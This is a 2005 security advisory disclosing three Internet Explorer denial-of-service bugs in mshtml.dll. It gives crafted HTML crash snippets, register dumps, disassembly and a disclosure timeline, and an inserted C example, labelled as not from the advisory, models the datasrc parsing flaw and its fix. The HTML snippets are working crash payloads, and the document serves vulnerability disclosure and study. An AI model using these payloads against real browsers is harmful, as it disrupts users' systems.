[NT] Microsoft Internet Explorer Multiple DoS (datasrc, mshtml.dll)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 28 Dec 2005 12:23:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Microsoft Internet Explorer Multiple DoS (datasrc, mshtml.dll)
------------------------------------------------------------------------
SUMMARY
<http://www.microsoft.com/windows/ie/default.mspx> Internet Explorer,
"abbreviated IE or MSIE, is a proprietary web browser made by Microsoft
and currently available as part of Microsoft Windows".
Microsoft Internet Explorer can be made to crash with an access violation
by feeding it specially crafted HTML files.
DETAILS
Vulnerable Systems:
* Microsoft Internet Explorer 6.0 for Windows XP Pro SP2
(6.0.2900.2180.xpsp_sp2)
* Microsoft Internet Explorer 6.0 for Windows 2000 SP4
* Microsoft Internet Explorer 5.5 for Windows XP Pro SP2
* Microsoft Internet Explorer 5.01 for Windows XP Pro SP2
Denial of Service 1: (<mshtml.dll>#7d663471)
The following HTML code forces MS IE 6 to crash:
<table datasrc=".">
These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01293b38 ecx=01293b20 edx=7d74ede0 esi=01293b20
edi=00000000 eip=7d663471 esp=0012e89c ebp=0012e89c
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d663469 8bff mov edi,edi
7d66346b 55 push ebp
7d66346c 8bec mov ebp,esp
7d66346e 8b4110 mov eax,[ecx+0x10]
FAULT ->7d663471 66833823 cmp word ptr [eax],0x23 ds:0023:00000000=????
7d663475 7405 jz mshtml+0x1b347c (7d66347c)
7d663477 33c0 xor eax,eax
7d663479 40 inc eax
7d66347a eb1e jmp mshtml+0x1b349a (7d66349a)
7d66347c ff7508 push dword ptr [ebp+0x8]
7d66347f 8b09 mov ecx,[ecx]
7d663481 83c002 add eax,0x2
7d663484 50 push eax
7d663485 e8466cebff call mshtml+0x6a0d0 (7d51a0d0)
7d66348a 8bc8 mov ecx,eax
7d66348c e8ad44fbff call mshtml!CreateHTMLPropertyPage+0x2432c (7d61793e)
7d663491 33c9 xor ecx,ecx
7d663493 85c0 test eax,eax
7d663495 0f9cc1 setl cl
7d663498 8bc1 mov eax,ecx
7d66349a 5d pop ebp
7d66349b c20400 ret 0x4
The access violation results in a null pointer dereference and is not
exploitable.
MS IE parses the value of the 'datasrc' attribute ("[n].[m]") in the
following way:
* Split the attribute value into two parts at the '.'
* Compare the first character of [n] with 0x23 ('#')
The crash occurs because a zero-length [n] (no memory is allocated for
this string, so its pointer is NULL) is used without any validation.
For example:
    char *t = NULL;

    if (t[0] == 0x23)   /* reads through a NULL pointer: access violation */
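As an added example (not code from the advisory), the following C model of the datasrc split-and-compare logic described above shows the unchecked dereference beside a hardened check; the function names and the NULL-for-empty-part behaviour are assumptions of the model, not IE's real implementation.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Extract [n], the part before the first '.'. Returns NULL when that part
 * is empty, modelling the unallocated zero-length string the advisory
 * describes (an assumption of this model, not IE's real allocator). */
static char *datasrc_part_n(const char *value)
{
    const char *dot = strchr(value, '.');
    size_t nlen = dot ? (size_t)(dot - value) : strlen(value);
    char *n;
    if (nlen == 0)
        return NULL;
    n = malloc(nlen + 1);
    if (n == NULL)
        return NULL;
    memcpy(n, value, nlen);
    n[nlen] = '\0';
    return n;
}

/* Returns 1 when the unchecked form `n[0] == '#'` would dereference NULL,
 * i.e. exactly the <table datasrc="."> case from the advisory. */
int datasrc_would_crash(const char *value)
{
    char *n = datasrc_part_n(value);
    int crash = (n == NULL);
    free(n);
    return crash;
}

/* Hardened check: tests the '#' prefix only after confirming [n] exists. */
int datasrc_is_id_ref(const char *value)
{
    char *n = datasrc_part_n(value);
    int ref = (n != NULL && n[0] == '#');   /* the validation IE 6 lacked */
    free(n);
    return ref;
}

int main(void)
{
    /* constructed sample attribute values, including the crashing "." */
    const char *samples[] = { "#tbl.rows", "srv.data", ".", "" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        printf("\"%s\": id_ref=%d would_crash=%d\n", samples[i],
               datasrc_is_id_ref(samples[i]), datasrc_would_crash(samples[i]));
    return 0;
}
```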
Denial of Service 2: (<mshtml.dll>#7d6c74b1)
The following HTML code forces MS IE 6 to crash:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
</samp></colgroup><ul><font><menu> <code> <var>
<sub><h2></fieldset>
</kbd></frameset>
</ins></map></noframes>
</isindex>
</code>
</div></title>
</del></var><isindex>
<i>
These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d6c748b 6a0b push 0xb
7d6c748d 33c0 xor eax,eax
7d6c748f 59 pop ecx
7d6c7490 8bfe mov edi,esi
7d6c7492 f3ab rep stosd
7d6c7494 8b45f8 mov eax,[ebp-0x8]
7d6c7497 8906 mov [esi],eax
7d6c7499 897228 mov [edx+0x28],esi
7d6c749c e9af010000 jmp mshtml+0x217650 (7d6c7650)
7d6c74a1 8b4728 mov eax,[edi+0x28]
7d6c74a4 8b7028 mov esi,[eax+0x28]
7d6c74a7 897728 mov [edi+0x28],esi
7d6c74aa 8b4320 mov eax,[ebx+0x20]
7d6c74ad 668b4002 mov ax,[eax+0x2]
FAULT ->7d6c74b1 8b4e24 mov ecx,[esi+0x24] ds:0023:00000024=????????
7d6c74b4 66250030 and ax,0x3000
7d6c74b8 662d0010 sub ax,0x1000
7d6c74bc 66f7d8 neg ax
7d6c74bf 897510 mov [ebp+0x10],esi
7d6c74c2 1bc0 sbb eax,eax
7d6c74c4 40 inc eax
7d6c74c5 50 push eax
7d6c74c6 e80c8efeff call mshtml+0x2002d7 (7d6b02d7)
7d6c74cb 0fb6c0 movzx eax,al
7d6c74ce 48 dec eax
7d6c74cf 83f80c cmp eax,0xc
7d6c74d2 0f877b010000 jnbe mshtml+0x217653 (7d6c7653)
7d6c74d8 ff2485c7796c7d jmp dword ptr [mshtml+0x2179c7 (7d6c79c7)+eax*4]
7d6c74df 8b4e20 mov ecx,[esi+0x20]
7d6c74e2 f6410208 test byte ptr [ecx+0x2],0x8
7d6c74e6 7419 jz mshtml+0x217501 (7d6c7501)
7d6c74e8 8b45fc mov eax,[ebp-0x4]
7d6c74eb ff7014 push dword ptr [eax+0x14]
7d6c74ee 8b4610 mov eax,[esi+0x10]
7d6c74f1 03460c add eax,[esi+0xc]
7d6c74f4 50 push eax
7d6c74f5 e899ba0100 call mshtml+0x232f93 (7d6e2f93)
The access violation appears to be a null pointer read and is not
exploitable.
Denial of Service 3: (<mshtml.dll>#7d6d8eba)
The following HTML code forces MS IE 6 to crash:
<acronym><dd><h5><applet></caption></applet><li></h1>
These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d6d8e84 894c2414 mov [esp+0x14],ecx
7d6d8e88 8b8ea4000000 mov ecx,[esi+0xa4]
7d6d8e8e 24fe and al,0xfe
7d6d8e90 57 push edi
7d6d8e91 89542410 mov [esp+0x10],edx
7d6d8e95 8954241c mov [esp+0x1c],edx
7d6d8e99 88442420 mov [esp+0x20],al
7d6d8e9d e89912e5ff call mshtml+0x7a13b (7d52a13b)
7d6d8ea2 8b4c2428 mov ecx,[esp+0x28]
7d6d8ea6 68b2a06e7d push 0x7d6ea0b2
7d6d8eab 8bf8 mov edi,eax
7d6d8ead e89bb7e5ff call mshtml+0x8464d (7d53464d)
7d6d8eb2 50 push eax
7d6d8eb3 8bcf mov ecx,edi
7d6d8eb5 e8dfebfdff call mshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c mov dx,[eax+0xc] ds:0023:0000000c=????
7d6d8ebe 6685d2 test dx,dx
7d6d8ec1 7c39 jl mshtml+0x228efc (7d6d8efc)
7d6d8ec3 833d50e3747d01 cmp dword ptr [mshtml+0x29e350 (7d74e350)],0x1
7d6d8eca 0fbffa movsx edi,dx
7d6d8ecd 7513 jnz mshtml+0x228ee2 (7d6d8ee2)
7d6d8ecf a14ce3747d mov eax,[mshtml+0x29e34c (7d74e34c)]
7d6d8ed4 8b484c mov ecx,[eax+0x4c]
7d6d8ed7 8b4134 mov eax,[ecx+0x34]
7d6d8eda 8d147f lea edx,[edi+edi*2]
7d6d8edd 8b3c90 mov edi,[eax+edx*4]
7d6d8ee0 eb23 jmp mshtml+0x228f05 (7d6d8f05)
The access violation results in a null pointer dereference and is not
exploitable.
Patch Availability:
There is no patch yet.
The vulnerability will be fixed in an upcoming service pack according to
the Microsoft Security Response Center.
Disclosure Timeline:
* 26.11.05 - DoS vulnerability discovered
* 15.12.05 - Vendor contacted
* 17.12.05 - Vendor confirmed vulnerability
* 24.12.05 - Public release
ADDITIONAL INFORMATION
The information has been provided by Christian Deneke <mailto:bugtraq@xxxxxxxxxx>
and Thomas Waldegger <mailto:bugtraq@xxxxxxxxxxxx>.
The original article can be found at: http://buha.info/board/ (http://buha.info/)